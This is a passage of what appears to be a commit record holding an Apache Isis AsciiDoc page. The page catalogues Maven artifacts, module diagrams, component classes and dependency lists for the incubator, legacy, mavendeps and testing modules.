+\norg.apache.isis.mavendeps:isis-mavendeps-webapp:pom:<managed> +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-specsupport-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.apache.isis.tooling:isis-tooling-model4adoc:jar:${project.version} +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.glassfish:javax.json:jar:1.1.4 +\norg.glassfish.jersey.ext:jersey-spring5:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis - Regression Tests (stable)\n[source,yaml]\n----\nGroup: org.apache.isis.regressiontests\nArtifact: isis-regressiontests-stable\nType: jar\nDirectory: \/regressiontests\/stable\n----\n|.Components\n****\no.a.i.testdomain.applayer.ApplicationLayerTestFactory +\no.a.i.testdomain.applayer.ApplicationLayerTestFactory$PreCommitListener +\no.a.i.testdomain.applayer.publishing.CommandSubscriberForTesting +\no.a.i.testdomain.applayer.publishing.EntityChangesSubscriberForTesting +\no.a.i.testdomain.applayer.publishing.EntityPropertyChangeSubscriberForTesting +\no.a.i.testdomain.applayer.publishing.ExecutionSubscriberForTesting +\no.a.i.testdomain.conf.Configuration_headless$HeadlessCommandSupport +\no.a.i.testdomain.jdo.JdoInventoryDao +\no.a.i.testdomain.jpa.JpaInventoryDao +\no.a.i.testdomain.jpa.springdata.EmployeeRepository +\no.a.i.testdomain.util.interaction.InteractionBoundaryProbe +\no.a.i.testdomain.util.kv.KVStoreForTesting +\no.a.i.testdomain.util.rest.RestEndpointService +\n****\n\n.Dependencies\n****\norg.apache.isis.extensions:isis-extensions-cors-impl:jar:<managed> +\norg.glassfish.jersey.ext:jersey-spring5:jar:<managed> +\n****\n|===\n\n== Incubator\n\n[plantuml,Incubator,svg]\n----\n@startuml(id=Incubator)\ntitle Incubator - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Incubator\\n[Software System]\" {\n rectangle \"==Apache Isis Incubator\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Incubator)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Incubator\n[source,yaml]\n----\nGroup: org.apache.isis.incubator\nArtifact: isis-incubator\nType: pom\nDirectory: \/incubator\n----\n|Collection of Apache Isis extensions, subdomains or BC mappings, currently incubating.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n|===\n\n=== Kroviz Client\n\n[plantuml,Kroviz Client,svg]\n----\n@startuml(id=Kroviz_Client)\ntitle Kroviz Client - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Kroviz Client\\n[Software System]\" {\n rectangle \"==Apache Isis Inc - Client kroViz\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Kroviz Client)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates 
|Description \n\n|Apache Isis Inc - Client kroViz\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.clients\nArtifact: isis-client-kroviz\nType: jar\nDirectory: \/incubator\/clients\/kroviz\n----\n|Initial sketches\n|===\n\n=== JavaFX Viewer\n\n[plantuml,JavaFX Viewer,svg]\n----\n@startuml(id=JavaFX_Viewer)\ntitle JavaFX Viewer - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JavaFX Viewer\\n[Software System]\" {\n rectangle \"==Apache Isis Inc - Viewer JavaFX\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Inc - Viewer JavaFX (Model)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Inc - Viewer JavaFX (UI Components)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Inc - Viewer JavaFX (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n@enduml\n----\n.Projects\/Modules (JavaFX Viewer)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Inc - Viewer JavaFX\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx\nType: pom\nDirectory: \/incubator\/viewers\/javafx\n----\n|Initial sketches\n\n|Apache Isis Inc - Viewer JavaFX (Model)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx-model\nType: jar\nDirectory: \/incubator\/viewers\/javafx\/model\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.openjfx:javafx-base:jar:<managed> +\norg.openjfx:javafx-controls:jar:<managed> +\norg.openjfx:javafx-fxml:jar:<managed> +\norg.openjfx:javafx-swing:jar:<managed> +\norg.openjfx:javafx-web:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer JavaFX (UI Components)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx-ui\nType: jar\nDirectory: \/incubator\/viewers\/javafx\/ui\n----\n|.Components\n****\no.a.i.incubator.viewer.javafx.ui.components.UiComponentFactoryFx +\no.a.i.incubator.viewer.javafx.ui.components.markup.MarkupFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.number.NumberFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.objectref.ObjectReferenceFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.other.FallbackFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.temporal.TemporalFieldFactory +\no.a.i.incubator.viewer.javafx.ui.components.text.TextFieldFactory +\no.a.i.incubator.viewer.javafx.ui.decorator.disabling.DisablingDecoratorForButton +\no.a.i.incubator.viewer.javafx.ui.decorator.disabling.DisablingDecoratorForFormField +\no.a.i.incubator.viewer.javafx.ui.decorator.icon.IconDecoratorForLabeled +\no.a.i.incubator.viewer.javafx.ui.decorator.icon.IconDecoratorForMenuItem 
+\no.a.i.incubator.viewer.javafx.ui.decorator.icon.IconServiceDefault +\no.a.i.incubator.viewer.javafx.ui.decorator.prototyping.PrototypingDecoratorForButton +\no.a.i.incubator.viewer.javafx.ui.decorator.prototyping.PrototypingDecoratorForFormField +\no.a.i.incubator.viewer.javafx.ui.decorator.prototyping.PrototypingInfoPopupProvider +\no.a.i.incubator.viewer.javafx.ui.main.MainViewFx +\no.a.i.incubator.viewer.javafx.ui.main.UiActionHandlerFx +\no.a.i.incubator.viewer.javafx.ui.main.UiBuilderFx +\no.a.i.incubator.viewer.javafx.ui.main.UiContextFxDefault +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.incubator.viewer:isis-viewer-javafx-model:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer JavaFX (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx-viewer\nType: jar\nDirectory: \/incubator\/viewers\/javafx\/viewer\n----\n|.Dependencies\n****\norg.apache.isis.incubator.viewer:isis-viewer-javafx-ui:jar:<managed> +\n****\n|===\n\n=== Vaadin Viewer\n\n[plantuml,Vaadin Viewer,svg]\n----\n@startuml(id=Vaadin_Viewer)\ntitle Vaadin Viewer - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Vaadin Viewer\\n[Software System]\" {\n rectangle \"==Apache Isis Inc - Viewer Vaadin\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Inc - Viewer Vaadin (Model)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Inc - Viewer Vaadin (UI Components)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Inc - Viewer Vaadin (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n@enduml\n----\n.Projects\/Modules (Vaadin Viewer)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Inc - Viewer Vaadin\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin\nType: pom\nDirectory: \/incubator\/viewers\/vaadin\n----\n|Initial sketches\n\n|Apache Isis Inc - Viewer Vaadin (Model)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin-model\nType: jar\nDirectory: \/incubator\/viewers\/vaadin\/model\n----\n|.Dependencies\n****\ncom.github.fge:jackson-coreutils:jar:1.8 +\ncom.vaadin:vaadin:jar:<managed> +\nio.swagger:swagger-compat-spec-parser:jar:1.0.39 +\nio.swagger:swagger-parser:jar:1.0.39 +\nio.swagger.core.v3:swagger-core:jar:2.0.5 +\nio.swagger.core.v3:swagger-models:jar:2.0.5 +\nio.swagger.parser.v3:swagger-parser-core:jar:2.0.5 +\nio.swagger.parser.v3:swagger-parser-v3:jar:2.0.5 +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer Vaadin (UI 
Components)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin-ui\nType: jar\nDirectory: \/incubator\/viewers\/vaadin\/ui\n----\n|.Components\n****\no.a.i.incubator.viewer.vaadin.ui.auth.LogoutHandlerVaa +\no.a.i.incubator.viewer.vaadin.ui.auth.VaadinAuthenticationHandler +\no.a.i.incubator.viewer.vaadin.ui.components.UiComponentFactoryVaa +\no.a.i.incubator.viewer.vaadin.ui.components.blob.BlobFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.clob.ClobFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.markup.MarkupFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.other.FallbackFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.temporal.TemporalFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.text.TextFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.text.uuid.UuidFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.pages.main.UiActionHandlerVaa +\no.a.i.incubator.viewer.vaadin.ui.pages.main.UiContextVaaDefault +\n****\n\n.Dependencies\n****\ncom.vaadin:vaadin-spring:jar:<managed> +\ncommons-fileupload:commons-fileupload:jar:1.4 +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.incubator.viewer:isis-viewer-vaadin-model:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer Vaadin (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin-viewer\nType: jar\nDirectory: \/incubator\/viewers\/vaadin\/viewer\n----\n|.Dependencies\n****\norg.apache.isis.incubator.viewer:isis-viewer-vaadin-ui:jar:<managed> +\n****\n|===\n\n== Legacy\n\n[plantuml,Legacy,svg]\n----\n@startuml(id=Legacy)\ntitle Legacy - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Legacy\\n[Software System]\" {\n rectangle \"==Apache Isis Legacy\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Legacy - Applib\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Legacy - Commons\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Legacy - Metamodel\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Legacy - REST Client\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Legacy - Runtime\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n@enduml\n----\n.Projects\/Modules (Legacy)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Legacy\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy\nType: pom\nDirectory: \/legacy\n----\n|Collection of 
deprecated Apache Isis functionality, for removal.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Legacy - Applib\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-applib\nType: jar\nDirectory: \/legacy\/extensions\/core\/applib\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Components\n****\no.a.i.legacy.applib.DomainObjectContainer +\n****\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n|Apache Isis Legacy - Commons\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-commons\nType: jar\nDirectory: \/legacy\/extensions\/core\/commons\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n|Apache Isis Legacy - Metamodel\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-metamodel\nType: jar\nDirectory: \/legacy\/extensions\/core\/metamodel\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.legacy:isis-legacy-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n|Apache Isis Legacy - REST Client\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-restclient\nType: jar\nDirectory: \/legacy\/mappings\/restclient\n----\n|As defined in Isis v1.x RO Applib.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Legacy - Runtime\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-runtime\nType: jar\nDirectory: \/legacy\/extensions\/core\/runtime\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.legacy:isis-legacy-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n|===\n","old_contents":"= System Overview\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. 
See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\nThese tables summarize all Maven artifacts available with _Apache Isis_.\n\n== App\n\n[plantuml,App,svg]\n----\n@startuml(id=App)\ntitle App - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"App\\n[Software System]\" {\n rectangle \"==Apache Isis Starter Parent\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (App)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Starter Parent\n[source,yaml]\n----\nGroup: org.apache.isis.app\nArtifact: isis-app-starter-parent\nType: pom\nDirectory: \/starters\n----\n|Parent pom providing dependency and plugin management for Apache Isis applications\nbuilt with Maven. Builds on top of spring-boot-starter-parent; a usage sketch follows this table.\n|===
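\n\nFor orientation, a minimal sketch of how an application's pom.xml might declare this starter parent; the version shown is only a placeholder for the Apache Isis release in use:\n\n[source,xml]\n----\n<parent>\n    <groupId>org.apache.isis.app<\/groupId>\n    <artifactId>isis-app-starter-parent<\/artifactId>\n    <version>X.Y.Z<\/version> <!-- placeholder: the Apache Isis release in use -->\n<\/parent>\n----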
\n\n== Mavendeps\n\n[plantuml,Mavendeps,svg]\n----\n@startuml(id=Mavendeps)\ntitle Mavendeps - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Mavendeps\\n[Software System]\" {\n rectangle \"==Apache Isis Maven Deps\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Maven Deps - BDD Integ Spec\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Maven Deps - Integration Testing\\n<size:10>[Container: packaging: pom]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Maven Deps - JDK11\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Maven Deps - JDO\\n<size:10>[Container: packaging: pom]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Maven Deps - JPA\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Maven Deps - Testing\\n<size:10>[Container: packaging: pom]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Maven Deps - Webapp\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 8 : \"\"\n2 .[#707070].> 9 : \"\"\n@enduml\n----\n.Projects\/Modules (Mavendeps)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Maven Deps\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps\nType: pom\nDirectory: \/mavendeps\n----\n|Collection of Apache Isis Maven Dependency Bundles.\n\n|Apache Isis Maven Deps - BDD Integ Spec\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-integspecs\nType: pom\nDirectory: \/mavendeps\/integspecs\n----\n|Defines a module that can be used as a single dependency for writing BDD (Cucumber) specs as integration tests.\n\n.Dependencies\n****\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-specsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - Integration Testing\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-integtests\nType: pom\nDirectory: \/mavendeps\/integtests\n----\n|Defines a module that can be used as a single dependency for integration tests.\n\n.Dependencies\n****\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - JDK11\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-jdk11\nType: pom\nDirectory: \/mavendeps\/jdk11\n----\n|Defines a module to bring in dependencies that were part of JDK 8 but\nhave been removed in JDK 11+. 
These dependencies are activated when the\nconsuming project is built with JDK 11 or higher.\n\n|Apache Isis Maven Deps - JDO\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-jdo\nType: pom\nDirectory: \/mavendeps\/jdo\n----\n|Defines a module that provides the default JDO persistence layer integration\nfor running an Apache Isis webapp (Wicket, Restful Objects and Shiro security).\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - JPA\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-jpa\nType: pom\nDirectory: \/mavendeps\/jpa\n----\n|Defines a module that provides the default JPA persistence layer integration\nfor running an Apache Isis webapp (Wicket, Restful Objects and Shiro security).\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-eclipselink:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - Testing\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-unittests\nType: pom\nDirectory: \/mavendeps\/unittests\n----\n|Defines a module that can be used as a single dependency for a set of common testing libraries.\n\n.Dependencies\n****\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - Webapp\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-webapp\nType: pom\nDirectory: \/mavendeps\/webapp\n----\n|Defines a module that can almost be used as a single dependency for running\nan Apache Isis webapp (Wicket, Restful Objects and Shiro security).\n\nNote: Also requires a persistence provider; see the sketch following this table.\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.security:isis-security-bypass:jar:<managed> +\norg.apache.isis.security:isis-security-keycloak:jar:<managed> +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-jaxrsresteasy4:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-viewer:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-viewer:jar:<managed> +\norg.springframework.boot:spring-boot-starter-tomcat:jar:<managed> +\norg.springframework.boot:spring-boot-starter-web:jar:<managed> +\n****\n|===
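\n\nTo illustrate the note above, a minimal sketch of how a consuming webapp's pom.xml might pair the webapp bundle with one of the persistence bundles (here JDO); versions are left to dependency management when building on the starter parent shown earlier:\n\n[source,xml]\n----\n<dependencies>\n    <!-- \"almost\" a single dependency for the webapp -->\n    <dependency>\n        <groupId>org.apache.isis.mavendeps<\/groupId>\n        <artifactId>isis-mavendeps-webapp<\/artifactId>\n        <type>pom<\/type>\n    <\/dependency>\n    <!-- plus a persistence provider, e.g. the JDO bundle -->\n    <dependency>\n        <groupId>org.apache.isis.mavendeps<\/groupId>\n        <artifactId>isis-mavendeps-jdo<\/artifactId>\n        <type>pom<\/type>\n    <\/dependency>\n<\/dependencies>\n----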
\n\n== Testing\n\n[plantuml,Testing,svg]\n----\n@startuml(id=Testing)\ntitle Testing - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<11>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<12>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<13>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<14>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<15>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<16>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<17>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<18>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor 